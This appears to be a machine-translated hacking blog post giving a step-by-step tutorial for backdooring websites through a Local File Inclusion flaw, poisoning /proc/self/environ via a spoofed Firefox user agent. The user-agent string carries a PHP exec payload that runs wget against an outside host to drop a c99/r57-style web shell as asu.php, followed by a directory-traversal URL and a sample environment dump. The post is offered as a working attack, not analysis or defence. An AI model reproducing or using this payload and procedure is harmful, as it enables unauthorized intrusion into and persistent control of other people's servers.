Simple tamper via LFI TO RACE (mozilla addon)
This time I will write a simple way LFI backdoring Lewan mozilla addon (tamper)
that start automatically on mozilla
equipment:
1. mozilla addon "https://addons.mozilla.org/pt-BR/firefox/addon/59"
2. assumptions should be using firefox / mozilla
3. LFI targets
4. injector (c99 / R57 / and others)
5. coffee + cigarettes
mozilla addon download and install or install on your mozilla
to activate the addon you have mozilla settings with CHOICES as follows:
1. select menu + tool + edit default user agent user agent
2 create a new user agent
3. Here you just need to change the script code in a user agent, code like the following:
-----------------------------------------------------------------------------------------------
Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9) Gecko/2008052906 Firefox/3.0
-----------------------------------------------------------------------------------------------
and you change the following:
--------------------------------------------------------------------------------------
< ? exec ('wget http://kcbschicago.com/bbs/fx.txt -O asu.php');?> ---------------------------------------------------------------------------------------
ddescripsi you an example their contents LFI and press ok
4. henceforth return your tools menu and select the default user agent + LFI
to run the addon
5. check on the help menu and select about mozilla mozilla addon installed to see what has not
if installed will show the script code that you plug was ...
6. mozilla addon installation is complete ...
http://www.site.com/index.php?page=../../../../../../../../../../../. . /.. /.. /.. / proc / self / environ
for example you can LFI vuln targets as above
with the provisions of read / proc / self / environ to be in acces
-------------------------------------------------- ----------------------------------------------
DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0.9, application / xhtml + xml, image / png, image / jpeg, image / gif, image / x-xbitmap , * / *; q = 0.1 HTTP_COOKIE = HTTP_HOST = PHPSESSID = 134cc7261b341231b9594844ac2ad7ac www.website.com HTTP_REFERER = http://www.website.com/index.php?view=../../../../ .. /.. / etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin
for upload backdor you quite easily langsug only you browse the mozilla bugs LFI vuln
Command code will download your files automatically injector
check your bakcdor
-------------------------------
http://www.site.com/asu.php
-------------------------------
and finally get...it
No comments:
Post a Comment